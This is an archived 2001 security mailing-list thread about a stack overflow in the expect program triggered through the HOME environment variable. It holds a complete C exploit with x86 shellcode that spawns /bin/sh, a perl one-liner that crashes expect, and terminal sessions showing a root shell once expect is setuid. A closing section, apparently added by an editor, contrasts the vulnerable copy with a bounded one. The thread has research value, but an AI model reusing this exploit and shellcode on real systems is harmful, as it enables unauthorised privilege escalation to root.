Re: Returned post ... Expect overflows

From: KF (dotslashat_private)
Date: Fri Jun 08 2001 - 02:10:56 PDT


    I am not sure who has access to Cray boxes... but expect MUST be suid on
    Cray... and from reading their FAQ it seems to me like a common
    troubleshooting method when expect does not work is to make it suid...

    If people are going to continue to comment on this can we agree to use a
    sensible title... I didn't mean to forward it on to the list with the title
    it ended up with...
    -KF
    
    Charles Stevenson wrote:
    > 
    > F*#! i sent the wrong paste (lol)... yes the easiest expect exploit if it
    > was suid would be to call it directly... ;-)
    > 
    > here is the paste i meant to send
    > 
    > [-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512
    > [ Buffer size:  512             Egg size:       2048    Aligment:       0]
    > [ Address:      0x100111f8      Offset:         0                        ]
    > sh-2.05$ export HOME=$EGG
    > sh-2.05$ id
    > uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
    > sh-2.05$ /usr/bin/expect
    > sh-2.05# id
    > uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
    > sh-2.05# ps
    >   PID TTY          TIME CMD
    >  1791 pts/5    00:00:00 sh
    >  1793 pts/5    00:00:00 ps
    > sh-2.05# exit
    > sh-2.05$ echo $HOME
    > 
    > Assigning the contents of $EGG to $HOME being the key... sorry folks about
    > the earlier blunder... ;-)
    > 
    > Best Regards,
    > Charles Stevenson
    > 
    > Charles Stevenson wrote:
    > 
    > > Kevin,
    > >
    > > Here's the PPC shellcode info you asked for:
    > >
    > > This is mainly a post of my PowerPC exploit efforts... anyways... Just
    > > for grins I tested a scenario under Debian PowerPC GNU/Linux with:
    > >
    > > ii  expect5.31     5.31.8-3       A program that "talks" to other programs.
    > >
    > > [-(core@euclid:~/sploits/shellcode/reet)> sudo chmod 4755 /usr/bin/expect
    > >
    > > [-(core@euclid:~/sploits/shellcode/reet)> ls -lL /usr/bin/expect
    > > -rwsr-xr-x    1 root     root         4328 Sep 20  2000 /usr/bin/expect
    > > [-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512
    > > [ Buffer size:  512             Egg size:       2048    Aligment:       0]
    > > [ Address:      0x100111f8      Offset:         0                        ]
    > > sh-2.05$ id
    > > uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
    > > sh-2.05$ /usr/bin/expect
    > > expect1.1> id
    > > uid=1000(core) gid=1000(core) euid=0(root) groups=1000(core),4(adm),24(cdrom),29(audio)
    > > expect1.2>
    > >
    > > If you find a program that calls expect suid let me know ;-)
    > >
    > > Best Regards,
    > > Charles Stevenson
    > >
    > > P.S. the "reet" tools I wrote to add PowerPC support are based on Aleph
    > > One's smashstack code.  It's available at:
    > > http://www.ezlink.com/~core/files/reet.tar.gz (Comments welcome:)
    > >
    > > > I have found an overflow in and coded the exploit code for several
    > > > versions of /usr/bin/expect... on SCO, Linux, and BSD variants. I am
    > > > unable to think of a situation where this would be useful due to the
    > > > fact that expect is not suid... can anyone help me determine if this is
    > > > exploitable to obtain root? Perhaps a suid expect script could be
    > > > exploited? Or maybe something like suid kppp which calls expect as a
    > > > helper program?
    > > >
    > > > [root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
    > > > [root@linux elguapo]# expect
    > > > Segmentation fault (core dumped)
    > > >
    > > > -Kevin Finisterre
    > > > dotslashat_private
    > > > [attachment: expect.c]
    > > >
    > > > //krfinisterreat_private or dotslashat_private
    > > > //this is output from my brute script...
    > > > //722
    > > > //Stack pointer: 0xbffffa18
    > > > //       Offset: 0x2d3
    > > > //  Return addr: 0xbffff745
    > > > //stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
    > > > //$3
    > > > //$L
    > > > //723
    > > > //Stack pointer: 0xbffffa18
    > > > //       Offset: 0x2d4
    > > > //  Return addr: 0xbffff744
    > > > //sh-2.04#
    > > > //note that I was root when I ran this ... expect is not suid
    > > >
    > > > #include <stdio.h>
    > > > #include <stdlib.h>
    > > > #include <string.h>
    > > > #include <unistd.h>
    > > >
    > > > #define BUFFERSIZE 533
    > > >
    > > > // Aleph One's idiom for reading the stack pointer: the value is left in
    > > > // %eax, the return register on 32-bit x86. Only meaningful on i386 and
    > > > // only without optimisation.
    > > > unsigned long sp(void)
    > > > {
    > > >         __asm__("movl %esp, %eax");
    > > > }
    > > >
    > > > int main(int argc,char **argv)
    > > > {
    > > >   // x86 Linux shellcode, ends in an execve of "/bin/sh"
    > > >   char hell[] =
    > > >         "\x29\xc0"
    > > >         "\x29\xc0"
    > > >         "\xb0\x47"
    > > >         "\x29\xdb"
    > > >         "\xb3\x0c"
    > > >         "\x89\xd9"
    > > >         "\xcd\x80"
    > > >         "\x5e"
    > > >         "\x29\xc0"
    > > >         "\x88\x46\x07"
    > > >         "\x89\x46\x0c"
    > > >         "\x89\x76\x08"
    > > >         "\xb0\x0b"
    > > >         "\x87\xf3"
    > > >         "\x8d\x4b\x08"
    > > >         "\x8d\x53\x0c"
    > > >         "\xcd\x80"
    > > >         "\xe8\xe3\xff\xff\xff"
    > > >         "\x2f\x62\x69\x6e\x2f\x73\x68";
    > > >         int i;
    > > >         int offset;
    > > >         long esp;
    > > >         long ret;
    > > >         long *addr_ptr;
    > > >         char *buffer, *ptr;
    > > >
    > > >         if (argc < 2)
    > > >         {
    > > >                 fprintf(stderr, "usage: %s <offset>\n", argv[0]);
    > > >                 exit(1);
    > > >         }
    > > >         offset = atoi(argv[1]);
    > > >         esp = sp();
    > > >         ret = esp-offset;       // guessed return address: our sp minus the offset
    > > >
    > > >         if(!(buffer = malloc(BUFFERSIZE)))
    > > >         {
    > > >                 printf("oops\n");
    > > >                 exit(-1);
    > > >         }
    > > >
    > > >         // fill the buffer with the guessed return address, 4 bytes at a
    > > >         // time; the bound keeps the last word inside the 533-byte allocation
    > > >         ptr = buffer;
    > > >         addr_ptr = (long *)ptr;
    > > >         for (i=0; i+4<=BUFFERSIZE; i+=4)
    > > >                 *(addr_ptr++) = ret;
    > > >
    > > >         // first half of the buffer is filler in front of the shellcode;
    > > >         // '\xeb02' is an out-of-range hex escape that the compiler warns
    > > >         // about and truncates to a single byte, kept as in the original
    > > >         for (i=0; i<BUFFERSIZE/2; i++)
    > > >                 buffer[i] = '\xeb02';
    > > >
    > > >         // shellcode sits in the middle of the buffer
    > > >         ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
    > > >         for(i=0; i<strlen(hell); i++)
    > > >                 *(ptr++) = hell[i];
    > > >
    > > >         buffer[BUFFERSIZE-1] = 0;
    > > >
    > > >         // hand the buffer to expect through $HOME and run it; the second
    > > >         // argument to execlp is argv[0], which must not be a null pointer
    > > >         setenv("HOME", buffer, 1);
    > > >         execlp("/usr/bin/expect", "expect", (char *)NULL);
    > > >         perror("execlp");
    > > >         return 1;
    > > > }
    > > >
    
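    As an added example (not code from the thread, and not expect's own source, which the thread never shows), the bug class behind the report above: a fixed-size stack buffer filled from $HOME with no length check, beside the bounded form a setuid program should use. RC_NAME, the 512-byte buffer and the probe_home_len helper are constructed assumptions.

```c
/* Added example, not code from the thread or from expect itself: the bug class
 * behind the report is a HOME environment string copied into a fixed stack
 * buffer with no length check. RC_NAME and the 512-byte size are assumptions. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define RC_NAME    "/.expect.rc"   /* constructed name, not expect's real file */
#define RC_BUFSIZE 512

/* Vulnerable pattern: a HOME of a few hundred bytes plus the suffix runs past
 * the stack buffer (the segfault in the thread). Shown for contrast only. */
void rc_path_unsafe(const char *home, char *out)
{
    char path[RC_BUFSIZE];
    strcpy(path, home);              /* no bound on strlen(home) */
    strcat(path, RC_NAME);
    strcpy(out, path);
}
/* Hardened pattern: validate HOME before any copy and let snprintf report a
 * result that would not fit, refusing instead of truncating or overflowing. */
int rc_path_safe(const char *home, char *out, size_t outlen)
{
    size_t i; int n;
    if (home == NULL || home[0] != '/')
        return -1;                   /* absent or not an absolute path */
    for (i = 0; home[i] != '\0'; i++)
        if (!isprint((unsigned char)home[i]))
            return -1;               /* control chars, raw shellcode bytes */
    if (out == NULL || outlen == 0)
        return -3;
    n = snprintf(out, outlen, "%s%s", home, RC_NAME);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -2;                   /* too long for the buffer: refuse */
    }
    return 0;
}
/* Self-test helper: a HOME of n bytes ('/' then 'A's, like the perl one-liner
 * in the thread) checked against a 512-byte destination. */
int probe_home_len(size_t n)
{
    char home[2048], out[RC_BUFSIZE];
    if (n == 0 || n >= sizeof home) return -1;
    memset(home, 'A', n);
    home[0] = '/';
    home[n] = '\0';
    return rc_path_safe(home, out, sizeof out);
}
```

    With a 512-byte destination the 433-byte HOME from the thread still fits, so the safe variant accepts it and only refuses once home plus suffix would no longer fit; the point is that the decision is made before any byte is written.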



    This archive was generated by hypermail 2b30 : Fri Jun 08 2001 - 10:18:39 PDT